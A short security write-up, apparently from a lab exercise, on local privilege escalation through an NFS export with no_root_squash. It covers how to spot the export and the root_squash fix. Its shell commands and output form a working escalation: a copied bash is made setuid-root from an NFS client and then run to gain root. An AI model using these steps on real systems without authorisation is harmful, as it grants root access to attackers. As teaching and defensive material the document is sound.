NFS (no_root_squash)
NFS (Local Privilege Escalation)
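Detect
Look for exports with no_root_squash in /etc/exports on the NFS server. Here the last line also exports to any host (*) and accepts unprivileged source ports (insecure).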
low@lower3:/$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/var/www/html/ *(rw,sync,insecure,no_root_squash,no_subtree_check)
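Abuse
With no_root_squash, root on an NFS client is not mapped to the anonymous user, so a chown/chmod made by client root lands on the server as root. Exporting with root_squash (the exports(5) default) and restricting the client list instead of * closes this.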
Victim
low@lower3:/$ cd /var/www/html/
low@lower3:/var/www/html$ cp /usr/bin/bash .
Attacker (as root on an NFS client, in the mounted share)
❯ chown root:root bash
❯ chmod 4755 bash
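Victim (bash -p keeps the setuid effective UID; a root-owned setuid file under the export is the artifact to look for)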
low@lower3:/var/www/html$ ./bash -p
bash-5.1# id ; hostname
uid=1000(low) gid=1000(low) euid=0(root) groups=1000(low)